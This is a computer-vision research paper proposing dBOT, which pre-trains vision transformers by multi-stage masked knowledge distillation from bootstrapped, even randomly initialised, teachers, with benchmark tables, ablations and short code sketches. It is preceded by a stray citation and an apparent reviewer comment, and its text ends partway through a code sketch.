Enric Gusó, Jordi Pons, Santiago Pascual, and Joan Serrà. On loss functions and evaluation metrics for music source separation. In *ICASSP 2022-2022 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)*, pp. 306–310. IEEE, 2022.
xmQMz9OPF5
Following my question above, another perspective for understanding this phenomenon is the limited scalability [1] of the asymmetric masking architecture proposed in MAE, which is also used as the main architecture in this work. In SwinV2 and EVA, by contrast, MIM pre-training has been quite important for training ViTs of giant sizes. Does the implementation of masking also affect the scalability of pre-training?
EXPLORING TARGET REPRESENTATIONS FOR MASKED AUTOENCODERS

Xingbin Liu\textsuperscript{1,2}\textsuperscript{*} Jinghao Zhou\textsuperscript{2}\textsuperscript{*} Tao Kong\textsuperscript{2}\textsuperscript{*} Xianming Lin\textsuperscript{1}\textsuperscript{†} Rongrong Ji\textsuperscript{1}

\textsuperscript{1}Xiamen University \textsuperscript{2}ByteDance

*Equal contribution. †Corresponding author ([email protected]).

ABSTRACT

Masked autoencoders have become popular training paradigms for self-supervised visual representation learning. These models randomly mask a portion of the input and reconstruct the masked portion according to assigned target representations. In this paper, we show that a careful choice of the target representation is unnecessary for learning good visual representations. Driven by this observation, we propose a multi-stage masked distillation pipeline and use a randomly initialized model as the teacher, enabling us to effectively train high-capacity models without any effort to carefully design the target representation. On various downstream tasks of classification, transfer learning, object detection, and semantic segmentation, the proposed method to perform masked knowledge distillation with bootstrapped teachers (dBOT) outperforms previous self-supervised methods by nontrivial margins. We hope our findings, as well as the proposed method, could motivate people to rethink the roles of target representations in pre-training masked autoencoders. The code and pre-trained models are publicly available at https://github.com/liuxingbin/dbot.

1 INTRODUCTION

Masked Image Modeling (MIM) (He et al., 2022; Wei et al., 2022a; Baevski et al., 2022; Zhou et al., 2021) has recently become an active research topic in the field of visual representation learning and establishes strong performance for vision recognition tasks, e.g., image classification, object detection, and semantic segmentation, also surpassing the traditional supervised learning mechanism (Touvron et al., 2021). To be specific, MIM randomly masks a portion of the input and then reconstructs the masked portion according to the transformed target, formulated as

$$\min_{\theta} \mathbb{E}_{x \sim D}\, \mathcal{M}(\mathcal{T}(x \odot (1 - M)), f_\theta(x \odot M)),$$ (1)

where “$\odot$” means element-wise product; $M$ is the patch mask; “$x \odot M$” represents “unmasked patches” and vice versa; $f_\theta(\cdot)$ is the learnable network to be pre-trained; $\mathcal{T}$ is the transformation function generating the reconstruction target, which can either be a parameterized network or a traditional image feature transformation method; and $\mathcal{M}(\cdot, \cdot)$ is the similarity measurement, e.g., the $l_2$-distance (He et al., 2022). A masked image is passed through the network $f_\theta(x \odot M)$ to reconstruct the visual representation of the intact image under the transformation $\mathcal{T}(x \odot (1 - M))$.

A crucial problem of MIM is how to choose the reconstruction target, i.e., $\mathcal{T}(\cdot)$ in Eq. (1). Previous methods use disparate teacher networks to generate the reconstruction target. BEiT (Bao et al., 2022) employs a pre-trained DALL-E (Ramesh et al., 2021) as the teacher network. In MaskFeat (Wei et al., 2022a), the authors use HOG (Dalal & Triggs, 2005), MoCo (He et al., 2020) and DINO (Caron et al., 2021) features to perform MIM; MVP (Wei et al., 2022b) employs a multi-modality model, CLIP (Radford et al., 2021), which is pre-trained on rich image-text pairs.
MAE (He et al., 2022) uses image pixels as the target, which functions likewise to a randomly initialized teacher network, as demonstrated in Appendix B.1. iBOT (Zhou et al., 2021) and data2vec (Baevski et al., 2022) use the exponential moving average (EMA) strategy to update the teacher’s parameters $\phi$. Though different methods differ in their architectural designs and optimization, the choice of the teacher network is crucial for each method and calls for a systematic study. In this work, we paraphrase a term, Masked Knowledge Distillation (MKD), to focus our discussion on a special case of MIM where the target is generated by a parameterized network (teacher network), i.e., \( \mathcal{T}(\cdot) = h_\phi(\cdot) \). In this setting, \( \mathcal{T} \) is the teacher network, and \( f \) is the student network.

The purpose of our work is to investigate whether a careful design of the teacher network for MKD matters. Such exploration is nontrivial given that different teacher networks encode different knowledge, which may induce diverse behaviors in the student networks, and given the painstaking selection of target representations in the field of MIM. To this end, we compare student networks distilled by four teacher networks with different computation pipelines, i.e., DINO (Caron et al., 2021) for contrastive learning, MAE (He et al., 2022) for masked autoencoding, DeiT (Touvron et al., 2021) for supervised learning, and DALL-E (Ramesh et al., 2021) for autoregressive generation. The four teachers are all pre-trained on ImageNet-1K for a fair comparison. To our surprise, although the behaviors of the teacher networks are very different, the distilled student networks share similar characteristics after several stages of MKD: (i) the performance variance between student networks distilled from different teachers rapidly decreases; (ii) the model weights and output features across layers within the networks share similar properties. Such observations indicate that the design of the target representation is not essential when pre-training with multiple stages, i.e., teacher networks do not matter with multi-stage masked knowledge distillation. Notably, we use a randomly initialized model as the teacher to perform multi-stage masked knowledge distillation, and find that it performs as well as teachers initialized from pre-trained models under the exact same settings! Using a random model as the teacher not only avoids an extra pre-training stage, but also alleviates the painstaking selection of the target representations.

Based on the above studies and observations, we naturally propose to perform masked knowledge distillation with bootstrapped teachers, dBOT for short. Specifically, masked knowledge distillation is performed repeatedly in multiple stages. At the end of each stage, we assign the student’s weights to the teacher and re-initialize the student’s weights to continue masked knowledge distillation. With a simple yet effective design that enables pre-training starting from randomly initialized teachers, dBOT achieves 84.5%, 86.6%, and 88.0% top-1 fine-tuning accuracy on ImageNet-1K (Deng et al., 2009) with ViT-B/16, ViT-L/16, and ViT-H/14, respectively, significantly surpassing the previous state of the art, MAE.
Beyond that, dBOT achieves 52.7 and 56.0 AP$_{box}$ for object detection on COCO (Lin et al., 2014), as well as 49.5 and 54.5 mIoU for semantic segmentation on ADE20K (Zhou et al., 2017), with ViT-B/16 and ViT-L/16 respectively. We also explore MKD with teachers of larger sizes, further boosting model performance on various visual tasks.

2 RELATED WORK

2.1 SELF-SUPERVISED VISUAL LEARNING

Self-supervised learning is an active research topic. Early practices revolve around contrastive learning (He et al., 2020; Chen et al., 2020; Grill et al., 2020; Caron et al., 2020; 2021), where the output features of images transformed by different data augmentations are pulled together. With the development of Masked Language Modeling (MLM) in language pre-training (Devlin et al., 2019), researchers also introduced the training strategy of masked reconstruction to visual pre-training. BEiT (Bao et al., 2022) uses DALL-E (Ramesh et al., 2021) to encode image patches as the targets for model reconstruction. iBOT (Zhou et al., 2021) uses an online teacher, shifting the target from offline to online to make the target semantically meaningful. In addition to using tokens obtained from offline or online models as reconstruction targets, MAE (He et al., 2022), SimMIM (Xie et al., 2022), and MaskFeat (Wei et al., 2022a) achieve good performance in masked-image reconstruction using low-level pixels or HOG (Dalal & Triggs, 2005) features. Among them, MAE uses an asymmetric encoder-decoder structure, greatly increasing the training efficiency. data2vec (Baevski et al., 2022) demonstrates good generalization on three modalities (vision, speech, and language) by reconstructing multiple neural network layer representations.

2.2 KNOWLEDGE DISTILLATION

Knowledge distillation (KD) is widely employed in model knowledge compression (Hinton et al., 2015); it improves the performance of a smaller student model by distilling the knowledge learned by a well-trained large teacher network. Further studies on, e.g., relational KD (Park et al., 2019), contrastive KD (Tian et al., 2019), and latent feature KD (Romero et al., 2015) improve the performance of vanilla KD.

Table 1: The top-1 classification accuracy on ImageNet-1K, object detection AP$_{box}$ on COCO with Cascade Mask R-CNN, and semantic segmentation mIoU on ADE20K with UperNet of dBOT using different models as the initialized teacher network. Note that all models are pre-trained on ImageNet-1K, including DALL-E, for a fair comparison. We perform distillation in each stage for 800 epochs. In the 1st stage, we distill from the initialized teacher to obtain a student. In the subsequent (i.e., 2nd, 3rd, etc.) stages, the obtained students are leveraged as bootstrapped teachers to distill new students.

| computation pipeline | initialized teacher | classification (0th / 1st / 2nd / 3rd) | object detection (0th / 1st / 2nd / 3rd / 4th) | semantic segmentation (0th / 1st / 2nd / 3rd / 4th) |
|----------------------|---------------------|----------------|------------------|-----------------------|
| Supervised | DeiT | 81.8 / 83.6 / 84.3 / 84.3 | 49.1 / 50.5 / 52.5 / 52.4 / - | - / 46.4 / 49.2 / 50.4 / 49.9 |
| Contrastive | DINO | 83.2 / 84.2 / 84.5 / 84.4 | 50.1 / 52.5 / 52.9 / 52.7 / - | - / 46.8 / 49.7 / 50.4 / 49.4 |
| Autoregressive | DALL-E | 81.1 / 83.5 / 84.4 / 84.3 | 31.9 / 51.0 / 52.7 / 52.5 / - | - / 31.9 / 47.4 / 49.6 / 49.3 |
| Autoencoding | MAE | 83.6 / 84.3 / 84.4 / 84.3 | 50.6 / 52.9 / 52.7 / 52.5 / - | - / 48.1 / 49.6 / 50.4 / 49.8 |
| - | random | 77.3 / 83.4 / 84.5 / 84.3 | 29.2 / 49.6 / 52.4 / 52.7 / 52.4 | 25.7 / 47.0 / 49.1 / 49.5 / 49.5 |
| performance variance | | 2.24 / 0.37 / 0.07 / 0.04 | 9.54 / 1.23 / 0.17 / 0.12 | 9.19 / 1.15 / 0.54 / 0.23 |
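The stage structure behind Table 1 can be summarized in a short driver loop. A minimal sketch under stated assumptions: `make_student` and `train_one_stage` are hypothetical callables, and the sketch conveys the schedule rather than the exact training code.

```python
import copy

def multi_stage_mkd(make_student, num_stages, train_one_stage):
    """Multi-stage masked knowledge distillation: the 1st stage distills from
    the initialized (possibly random) teacher; each later stage uses the
    previous student as a bootstrapped, frozen teacher."""
    teacher = make_student()                   # 0th stage: initialized teacher
    for stage in range(num_stages):
        student = make_student()               # fresh student per stage
        train_one_stage(student, teacher)      # teacher kept fixed throughout
        teacher = copy.deepcopy(student)       # student becomes the next teacher
        for p in teacher.parameters():
            p.requires_grad_(False)
    return teacher
```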
Beyond its prominence in the field of supervised learning, KD has recently cut a figure in self-supervised learning. Concurrent work manages to adopt conventional feature distillation (Wei et al., 2022c) to match contrastive models with MIM-trained ones. Nevertheless, it shows negligible gains on MIM-trained models such as MAE. BEiT (Bao et al., 2022), MaskFeat (Wei et al., 2022a) and MVP (Wei et al., 2022b) could be seen as distilling knowledge from dVAE (Ramesh et al., 2021), HOG features (Dalal & Triggs, 2005) and the language-induced model CLIP (Radford et al., 2021), respectively, within the discourse of MKD. Until now, no work has conducted a system-level study on how to choose adequate target representations or teacher networks to guide the learning of MKD.

3 DOES $h_\phi(\cdot)$ MATTER IN MKD?

Given the general form of masked knowledge distillation as shown in Eq. (1), in this section, we aim to investigate whether the careful design of the target, i.e., the teacher network $h_\phi(\cdot)$, matters. Specifically, we want to answer three questions as follows:

• Whether models distilled from different $h_\phi(\cdot)$ differ in terms of their transfer performances?
• Whether distilled models differ in terms of their weights and outputs?
• If $h_\phi(\cdot)$ does not matter, what matters more to close the gap between students distilled from different $h_\phi(\cdot)$?

To answer these questions, we employ the standard masked autoencoder framework (He et al., 2022) to conduct a system-level study, introduced next.

Common setup. The architectural settings strictly follow (He et al., 2022). For the teacher network, we use the vanilla ViT (Dosovitskiy et al., 2021) with intact input. For the student network with masked input, we use the asymmetric encoder-decoder structure. The student’s output is further projected to a dimension the same as that of the teacher’s embedding. During pre-training, we use the Smooth L1 loss (Girshick, 2015) for the optimization of the student network, and the teacher network is kept fixed. Detailed settings are deferred to Appendix A.1. We pre-train models on ImageNet-1K (Deng et al., 2009) and conduct evaluation under classification on ImageNet, object detection on COCO (Lin et al., 2014), and semantic segmentation on ADE20K (Zhou et al., 2017).

3.1 PRELIMINARY STUDY

We first investigate the effect of using networks initialized differently as teachers for masked knowledge distillation. We instantiate four canonical methods as pre-trained teachers, each from a category distinguished by its computation pipeline, i.e., DeiT (Touvron et al., 2021) for supervised learning, DINO (Caron et al., 2021) for contrastive learning, DALL-E (Ramesh et al., 2021) for autoregressive generation, and MAE (He et al., 2022) for autoencoding. The results of the initialized teacher at the 0th stage and of its distilled student at the 1st stage are shown in Table 1.

**Different \( h_\phi(\cdot) \) lead to similarly performed students.** After the first stage of masked knowledge distillation, the student consistently outperforms the teacher, as shown in Table 1, yielding 1.8%, 1.0%, 2.4%, and 0.7% performance gains for the four different \( h_\phi(\cdot) \) respectively, demonstrating the effectiveness of masked knowledge distillation for visual representation learning.
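Concretely, the per-batch step under the common setup above looks roughly as follows. This is a sketch under stated assumptions: `student`, `teacher`, and `proj` are assumed modules, `mask` is a `(B, L)` boolean patch mask, and restricting the loss to masked positions is our MAE-style assumption rather than a detail stated in the text.

```python
import torch
import torch.nn.functional as F

def mkd_step(student, proj, teacher, x, mask):
    """One masked-knowledge-distillation step: the frozen teacher encodes the
    intact image; the student sees masked input; the student's output is
    projected to the teacher's embedding dimension and regressed with a
    Smooth L1 loss."""
    with torch.no_grad():
        target = teacher(x)                  # (B, L, C_t) patch features, intact input
    pred = proj(student(x, mask))            # (B, L, C_s) -> (B, L, C_t)
    # Loss on reconstructed (masked) positions only -- an assumption here.
    return F.smooth_l1_loss(pred[mask], target[mask])
```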
Although the performance order of different \( h_\phi(\cdot) \) is preserved after the first stage of distillation, the students distilled from different \( h_\phi(\cdot) \) have closer downstream performances compared to the original \( h_\phi(\cdot) \). The performance variance drops from 2.24 to 0.37 after the first stage of distillation. The conclusion holds true for the experiments on object detection and semantic segmentation.

### 3.2 Distillation with Multiple Stages

Given the observation that a better teacher generally induces a better student, we are motivated to use the trained student as teacher to train a new student repeatedly, and study whether a similar trend endures. If so, we would like to seek at what stage the performances saturate for different downstream tasks, as well as the discrepancy among the results incurred by different initialized teachers.

**\( h_\phi(\cdot) \) does not matter with multi-stage distillation.** The performance gain is valid but decreases with multiple stages and eventually vanishes. Taking MAE as the initialized teacher as an example, students outperform teachers by +0.7%, +0.1%, -0.1% for classification, +2.3, -0.2, -0.2 points for object detection, and +1.5, +0.8, -0.6 points for semantic segmentation, from the 0th to the 3rd stage. Other teachers and downstream tasks share the same conclusion. Moreover, the performance gaps between students learned from different teachers decrease, especially after multiple stages, as shown by the performance variance at different stages in the last row of Table 1. Taking the classification task for instance, the variance decreases along with the training stage, i.e., 2.24, 0.37, 0.07, 0.04, which reveals that the choice of \( h_\phi(\cdot) \) exerts little influence on the downstream performance. See Table 1 for results on more downstream tasks. To demonstrate models’ differences in terms of weights and outputs, we conduct a property analysis in Sec. 6. Similar properties are found, which verifies our conclusion.

**A random \( h_\phi(\cdot) \) works surprisingly well.** Since the choice of \( h_\phi(\cdot) \) does not matter, an intuitive experiment is to see what happens when we employ a **random teacher**, whose parameters are randomly initialized at the 0th stage. To our surprise, using a random teacher achieves performance comparable with other pre-trained teachers. Compared to a randomly initialized model, students distilled over multiple stages achieve 6.1%, 20.4, and 21.3 points of performance gain on classification, object detection and semantic segmentation respectively. Empirically, object detection and semantic segmentation require one more stage to saturate compared to classification. The saturated results are on par with those induced by pre-trained teachers, which enables us to train a state-of-the-art model more efficiently, without the need of an extra pre-training stage for the initialized teacher (e.g., contrastive learning as in DINO).

### 4 MKD with Bootstrapped Teachers

The study in Sec. 3 motivates us to propose a multi-stage distillation pipeline for pre-training. The entire pre-training undergoes multiple stages split by breakpoints. For each stage, we fix the teacher network to obtain a stable visual representation, guiding the learning of the student network. The pre-trained student model is then used as a stronger teacher and distills its knowledge to a new subsequent student, providing richer visual representations.
We re-initialize the student network at each breakpoint. The above process repeats itself: the teachers keep being bootstrapped from the students, until a performance saturation on downstream tasks is observed. Hence, our strategy is to perform distillation with **bootstrapped teachers**. We illustrate our framework in Fig. 1c and the conceptual relations with the other two paradigms in Fig. 1. Noting \( m \) as the momentum, which indicates how fast the teacher’s parameters \( \theta_t \) are updated from the student’s parameters \( \theta_s \), i.e., \( \theta_t = m \cdot \theta_t + (1 - m) \cdot \theta_s \), we present the following discussions.

Figure 1: Conceptual comparison of three masked image modeling paradigms. The difference between the three paradigms is how the parameters of the teacher network are updated. (a): The parameters of the teacher network are frozen during the whole training process, constructing an offline teacher. (b): Exponential moving average is applied to correlate the parameters of the student and teacher networks, constructing an online teacher. (c): dBOT uses a multi-stage distillation pipeline, i.e., the parameters of the teacher network are frozen except at breakpoints, where we assign student parameters to the teacher and re-initialize the student network.

Relations with previous methods. One group of works leverages a pre-trained teacher as in Fig. 1a, e.g., BEiT (Bao et al., 2022). The teacher requires an extra stage of pre-training and is kept fixed with $m = 1$. Ideally, pre-trained teachers bear additional knowledge which is prone to be more semantically meaningful, promoting the student’s learning. Nonetheless, the pre-training of these teachers entails a completely different computation pipeline (Wei et al., 2022a) and often additional data (Wei et al., 2022b), complicating its practical use. Another group, as in Fig. 1b, works with random teachers, dispensing with pre-trained ones. Starting from randomness, the teachers in iBOT (Zhou et al., 2021) and data2vec (Baevski et al., 2022), however, are bootstrapped from the student, typically with $m \in (0, 1)$, e.g., 0.9998 as in (Baevski et al., 2022). Although bootstrapping induces improving quality of the teacher’s representation, the pipeline is plagued by its optimization instability and sensitivity towards hyper-parameters. We note that MAE uses an identity mapping of pixels as the target, which is observed to function similarly to a fixed random teacher with $m = 1$, as shown in Appendix B.1. Despite its simplicity, such practice eludes synergy between the teacher and the student. Comparatively, dBOT uses $m = 0$ at every breakpoint and $m = 1$ otherwise.

5 EXPERIMENTS

5.1 PRE-TRAINING

Architecture. We use Vision Transformers (Dosovitskiy et al., 2021) of different capacities, i.e., ViT-B/16, ViT-L/16, and ViT-H/14, for dBOT. The input image of size $224 \times 224$ is first divided by a linear projection head into non-overlapping patch tokens, 196 in total for ViT-B and ViT-L, and 256 for ViT-H. We exactly follow the common setup demonstrated in Sec. 3, e.g., a student with asymmetric encoder-decoder architecture, a teacher with intact input, etc.

Optimization. The learning rate is first linearly increased to the initial learning rate for the first 40 epochs and then cosine annealed to 0. The initial learning rate is set as $1.5e^{-4} \times \text{batch\_size} / 256$, with batch size being 4096 for all models.
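This warmup-plus-cosine schedule is easy to make concrete. A sketch (epoch-granular for simplicity; the exact update granularity is an assumption):

```python
import math

def lr_at_epoch(epoch, total_epochs, batch_size, base_lr=1.5e-4, warmup=40):
    """Linear warmup to init_lr = 1.5e-4 * batch_size / 256 over the first
    40 epochs, then cosine annealing to 0, as described above."""
    init_lr = base_lr * batch_size / 256
    if epoch < warmup:
        return init_lr * (epoch + 1) / warmup
    progress = (epoch - warmup) / max(1, total_epochs - warmup)
    return init_lr * 0.5 * (1.0 + math.cos(math.pi * progress))
```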
We use the AdamW optimizer (Loshchilov & Hutter, 2019) and the Smooth L1 loss (Girshick, 2015) to optimize the parameters of the student network. Stochastic depth drop rates of 0.2, 0.2, and 0.3 are applied for ViT-B, ViT-L, and ViT-H, respectively. We use only center-crop and flipping for data augmentation. As shown in Table 1, the performance of different downstream tasks saturates at different stages. By default, we pre-train all models for classification with 2 stages, and for object detection and semantic segmentation with 3 stages.

5.2 IMAGENET RESULTS

We primarily focus on the end-to-end fine-tuning performance and report the top-1 validation accuracy on the ImageNet-1K (Deng et al., 2009) dataset.

Table 2: Comparison of fine-tuning results with previous methods on ImageNet-1K. We evaluate by the end-to-end fine-tuning protocol. All results are based on an image size of 224, except for ViT-H with an extra result at image size 448. We perform distillation in each stage for 800 epochs and with 2 stages (our default) in total.

| method | ViT-B | ViT-L | ViT-H | ViT-H<sub>448</sub> |
|--------------|-------|-------|-------|---------------------|
| supervised | 82.3 | 82.6 | 83.1 | - |
| MoCo v3 | 83.2 | 84.1 | - | - |
| DINO | 83.6 | - | - | - |
| *methods based on masked image modeling:* | | | | |
| BEiT | 83.2 | 85.2 | - | - |
| iBOT | 84.0 | 85.2 | - | - |
| MAE | 83.6 | 85.9 | 86.9 | 87.8 |
| data2vec | 84.2 | 86.2 | - | - |
| dBOT | 84.5 | 86.6 | 87.4 | 88.0 |

Table 3: Semi-supervised learning on ImageNet-1K with different self-supervised models. 1% and 10% represent the label fraction. ViT-B is selected as the architecture. All results are based on our implementation with the official pre-trained models.

| method | 1% | 10% |
|--------|----|-----|
| supervised | - | 68.9 |
| data2vec | 48.7 | 71.2 |
| MAE | 53.1 | 73.1 |
| dBOT | 54.8 | 74.5 |

Table 4: Object detection and instance segmentation on COCO, and semantic segmentation on ADE20K. All results are based on our implementation with the official pre-trained models. We perform distillation in each stage for 800 epochs and with 3 stages (default).

| method | AP$_{box}$ (ViT-B) | AP$_{box}$ (ViT-L) | AP$_{mask}$ (ViT-B) | AP$_{mask}$ (ViT-L) | mIoU (ViT-B) | mIoU (ViT-L) |
|--------|------|------|------|------|------|------|
| supervised | 49.8 | 51.2 | 43.2 | 44.5 | 47.4 | 49.9 |
| DINO | 50.1 | - | 43.4 | - | 48.4 | 52.3 |
| MAE | 50.6 | 54.0 | 43.9 | 46.2 | 48.2 | - |
| iBOT | 51.3 | - | 44.3 | - | 48.1 | 53.6 |
| dBOT | 52.7 | 56.0 | 45.7 | 48.2 | 49.5 | 54.5 |

Evaluation setup. We sweep the base learning rate within a range, with a batch size of 1024. We warm up the learning rate during the first 5 epochs to the initial learning rate and use a cosine schedule for the rest of the epochs. We average all the patch tokens output from the last transformer block and pass them into a linear projection head for classification. We fine-tune ViT-B for 100 epochs, and ViT-L and ViT-H for 50 epochs in total.

Comparison with previous results. We report the fine-tuning results on ImageNet-1K, mainly focusing on the comparison of self-supervised and supervised methods. Supervised denotes the results reported in MAE. As shown in Table 2, dBOT achieves remarkable results with different model capacities, demonstrating its scalability. We achieve top-1 evaluation accuracy of 84.5%, 86.6%, and 87.4% with ViT-B, ViT-L, and ViT-H, yielding gains of 0.9%, 0.7%, and 0.5% compared to MAE.
When fine-tuned with an image size of 448, dBOT further achieves an accuracy of 88.0%, surpassing the results obtained by MAE.

Semi-supervised learning. To investigate the label efficiency of dBOT, we also show the semi-supervised results on ImageNet-1K under different labeled data availability in Table 3. We focus on the comparison with self-supervised learning methods. The label-fraction sampling strategy follows (Chen et al., 2020). dBOT outperforms MAE by 1.7 and 1.4 points using 1% and 10% of the labels, respectively, showing a higher label efficiency.

5.3 Downstream Tasks

To further demonstrate the effectiveness, we consider dense prediction tasks: object detection, semantic segmentation, and instance segmentation.

Object detection and instance segmentation. We consider Cascade Mask R-CNN (Cai & Vasconcelos, 2019) as the task head for object detection and instance segmentation with ViT-B and ViT-L on COCO (Lin et al., 2014). We report AP$_{box}$ and AP$_{mask}$ for object detection and instance segmentation respectively. The results are demonstrated in Table 4. dBOT outperforms the previous self-supervised and supervised methods by a large margin, setting a new state-of-the-art result with both ViT-B and ViT-L. With ViT-B, dBOT achieves an AP$_{box}$ of 52.7 and an AP$_{mask}$ of 45.7, outperforming the supervised baseline pre-training by 2.9 and 2.5 points, respectively. With ViT-L, such improvement is more prominent with 4.8 and 3.6 points respectively, showing the high scalability of dBOT for model capacity in downstream dense prediction tasks.

Table 5: **Ablation study with ViT-B/16 on ImageNet-1K validation set.** We report the end-to-end fine-tuning top-1 accuracy (%). The ablation study is conducted with randomly initialized teachers. We note that models distilled from pre-trained teachers generally share similar trends. Default settings are marked in gray. vanilla denotes \( m \) being 0 at the breakpoint and 1 otherwise. cosine(a,b) denotes \( m \) is cosine annealed from value a to b.

(a) **Stage split number.** 2-stage distillation works the best.

| pre-training epochs | acc |
|---------------------|-----|
| 1600 | 83.6 |
| 800-800 | 84.5 |
| 533-533-533 | 84.4 |

(b) **Epoch for each stage.** 2-stage distillation with 800 epochs for each stage works the best.

| pre-training epochs | acc |
|---------------------|-----|
| 400-800 | 84.3 |
| 800-400 | 84.3 |
| 800-800 | 84.5 |
| 800-1200 | 84.3 |

(c) **Momentum update.** The vanilla strategy explicitly splitting stages works the best.

| momentum | acc |
|--------------------|-----|
| vanilla | 84.5 |
| 0.9998 | 83.6 |
| 0.9999 | 83.9 |
| cosine(0.996,1) | 82.1 |

(d) **Target normalization.** Using patch representations w/o [LN] as targets works best.

| target norm | acc |
|--------------------|-----|
| w/ [LN] | 84.3 |
| w/o [LN] | 84.5 |

(e) **Student initialization.** Re-initializing the student’s weight at breakpoints works best.

| student init | acc |
|--------------------|-----|
| w/o re-initialize | 84.2 |
| w/ re-initialize | 84.5 |

(f) **Mask ratio.** A mask ratio of 75% works best.

| mask ratio | acc |
|--------------------|-----|
| 0.7 | 84.3 |
| 0.75 | 84.5 |
| 0.8 | 84.2 |

**Semantic segmentation.** We adapt UperNet (Xiao et al., 2018) as the task head for semantic segmentation with ViT-B and ViT-L on ADE20K (Zhou et al., 2017). We report the mIoU and mAcc for semantic segmentation, and the results are demonstrated in Table 4.
We achieve the best performance on semantic segmentation compared to previous self-supervised methods by a nontrivial margin. dBOT improves mIoU from 47.4 to 49.5 with ViT-B, and from 49.9 to 54.5 with ViT-L, yielding gains of 2.1 and 4.6 points respectively, compared to the supervised baseline. The improvement in semantic segmentation is as significant as in object detection.

### 5.4 Ablation Study

**Stage split number.** We study the influence of the stage number by splitting the total 1600 training epochs into varying numbers of distillation stages, from one to three. Results are shown in Table 5a. 2-stage distillation works the best (for the classification task), achieving 84.5% accuracy. Splitting the epochs into 3 stages brings a 0.1% performance drop, while all splitting strategies obtain a top-1 accuracy of at least 83.6%, indicating the generalizability of the pipeline.

**Epoch for each stage.** Table 5b studies the proper number of epochs needed for each stage in a 2-stage distillation pipeline. With the 2\(^{nd}\) stage distilling for 800 epochs, longer training in the 1\(^{st}\) stage induces a 0.2% improvement (84.3% vs. 84.5%). With the 1\(^{st}\) stage distilling for 800 epochs, 800 epochs are enough for the 2\(^{nd}\) stage, since 1200 epochs incur no gain. Evenly splitting the epochs in 2-stage masked knowledge distillation achieves the best performance.

**Momentum update.** In dBOT we use a multi-stage distillation pipeline, which amounts to distilling from a momentum encoder with \( m \) being 0 at every breakpoint and 1 otherwise. We further investigate other momentum update strategies commonly used in self-supervised learning. Results are shown in Table 5c. The vanilla strategy works the best.

**Target normalization.** We study whether the patch tokens obtained from the self-attention blocks, when used as target representations, should be passed through the Layer Normalization (Ba et al., 2016) layer \([\text{LN}]\). The accuracy of models after 2-stage distillation is shown in Table 5d. Patch tokens taken directly from the transformer block, without passing through \([\text{LN}]\), are more suitable as target representations to guide students’ learning.

Figure 2: Average attention distance of different heads w.r.t layer number of ViT-B with different teachers and their corresponding student distilled for 2 stages. The first row showcases the teachers while the second showcases the 2\textsuperscript{nd}-stage distilled student. Models using different teachers achieve the same result. The distilled students obtain more local attention compared to the teachers.

Figure 3: Singular value decomposition of different layers of ViT-B with different teachers and their corresponding student distilled for 2 stages. The first row showcases the teachers while the second showcases the 2\textsuperscript{nd}-stage distilled student. Models using different teachers achieve the same result.

**Student initialization.** We study whether the student’s weights should remain when entering the next stage of distillation. Specifically, we either keep the student’s weights unchanged or re-initialize the student at each breakpoint. As shown in Table 5e, re-initializing the student’s weights works the best.

**Mask ratio.** Table 5f shows the influence of the mask ratio on end-to-end fine-tuning. The optimal mask ratio for dBOT is 75%, the same as that in MAE.

## 6 Property Analysis

We investigate the properties of models distilled from different teachers under certain criteria, analyzing models’ weights and outputs.
Further, training efficiency is briefly discussed in comparison with previous methods.

**Averaged attention distance.** We compute the averaged attention distance (Dosovitskiy et al., 2021), averaged over the ImageNet-1K val set, for each attention head of different blocks to understand how local and global information flows into Transformers. Average attention distances for dBOT using DeiT, DINO, MAE, DALL-E, and random models as teachers are illustrated in Fig. 2. The higher the attention distance, the more global the model's attention over an image. Although the average attention distance of disparate initialized teachers varies greatly, their distilled students after multi-stage distillation exhibit similar behaviors, e.g., models’ attention toward local or global contents. Additionally, dBOT achieves more local attention than previous works.

Table 6: Training time (s) per epoch for different methods with ViT-B/16, ViT-L/16, and ViT-H/14. asym. denotes whether to use an asymmetric encoder-decoder structure. All entries are tested on the same setting, i.e., with 32 NVIDIA A100-80G GPUs.

| method | data2vec | BEiT | MAE | dBOT |
|--------|----------|------|-----|------|
| asym. | ✗ | ✗ | ✓ | ✓ |
| ViT-B | 169 | 166 | 79 | 109 |
| ViT-L | 431 | 356 | 125 | 200 |
| ViT-H | 960 | 751 | 240 | 416 |

Table 7: Results of classification (cls.), object detection (det.), and semantic segmentation (seg.) on IN1K, COCO, and ADE20K. For same-size teachers (colored gray), students are pre-trained with default settings. For bigger teachers, students are pre-trained for 1 stage from 2-stage distilled teachers.

| teacher | student | cls. | det. | seg. |
|---------|---------|------|------|------|
| ViT-B | ViT-B | 84.5 | 52.7 | 49.5 |
| ViT-L | ViT-B | 84.6 (+0.1) | 53.1 (+0.4) | 50.1 (+0.6) |
| ViT-H | ViT-B | 84.6 (+0.1) | 53.5 (+0.8) | 50.8 (+1.3) |
| ViT-L | ViT-L | 86.6 | 56.0 | 54.5 |
| ViT-H | ViT-L | 86.8 (+0.2) | 56.1 (+0.1) | 55.2 (+0.7) |

**Singular value decomposition.** We compute the percentage of the top-$k$ singular values (Wall et al., 2003) of the embedding w.r.t each layer. The results are averaged over the ImageNet-1K val set. We showcase the results with $k$ varying from 1 to 5. Singular value decompositions for dBOT using DeiT, DINO, MAE, DALL-E, and random models as teachers are shown in Fig. 3. The higher the percentage, the more correlated the model's output over an image, indicating larger redundancy of its spatial representations and thus less suitability for compression. Intuitively, the random model at the 0th stage has the largest percentage given that pixels are merely randomly projected. The student networks distilled from different initialized teachers exhibit similar behaviors.

**Training efficiency.** We compute the training time per epoch for different methods in Table 6. With an asymmetric encoder-decoder architecture (asym.) as the default setup, dBOT performs slower than MAE, but much faster than data2vec and BEiT. This advantage becomes more significant for models of larger size.

7 DISTILL FROM BIGGER TEACHERS

Inspired by canonical practices in knowledge distillation (Hinton et al., 2015), we use larger teachers to distill smaller students, showcasing the potential of MKD in general. Specifically, we attempt to use ViT-L/H as teacher networks to distill ViT-B, and ViT-H as the teacher network to distill ViT-L. All larger teachers are first distilled for 2 stages with the default setup. We resize the image to 196 × 196 for ViT-H/14 to keep the length of its output the same as that of ViT-B/L.
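Returning to the averaged attention distance of Fig. 2, the quantity is simple to compute from attention maps. A sketch (distances measured in patch-grid units, which is an assumption about the paper's exact units):

```python
import torch

def avg_attention_distance(attn, grid):
    """Per-head average attention distance (Dosovitskiy et al., 2021):
    the attention-weighted mean distance between query and key patches.
    attn: (H, L, L) attention probabilities, with L = grid ** 2."""
    ys, xs = torch.meshgrid(torch.arange(grid), torch.arange(grid), indexing="ij")
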